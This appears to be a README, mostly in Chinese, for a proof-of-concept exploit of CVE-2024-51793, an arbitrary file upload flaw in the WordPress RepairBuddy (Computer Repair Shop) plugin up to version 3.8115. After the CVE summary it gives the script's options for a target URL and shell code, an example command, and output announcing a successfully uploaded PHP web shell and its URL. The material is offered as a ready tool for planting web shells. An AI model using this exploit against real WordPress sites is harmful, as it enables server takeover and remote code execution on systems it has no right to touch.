CVE-ID: CVE-2024-51793
发布时间: 2024-11-11
更新时间: 2024-11-11
标题: WordPress RepairBuddy 插件 <= 3.8115 - 任意文件上传漏洞
描述:
Webful Creations Computer Repair Shop 中存在危险类型文件的无限制上传漏洞,允许向 Web 服务器上传 Web Shell。此问题影响 Computer Repair Shop:从 n/a 至 3.8115 版本。
CWE:
CVSS:
这是针对 WordPress RepairBuddy 插件版本 <= 3.8115 中任意文件上传漏洞的概念验证利用程序。该利用程序允许攻击者向易受攻击的服务器上传 Web Shell。
requests 库(pip install requests)usage:
CVE-2024-51793.py [-h] -u URL [-shell SHELL]
WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-shell SHELL Shell code to upload
python
CVE-2024-51793.py -u http://target.com/wordpress
Exploit By : Nxploit Khaled Alenazi,
🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php
漏洞利用者:Nxploited, Khaled Alenazi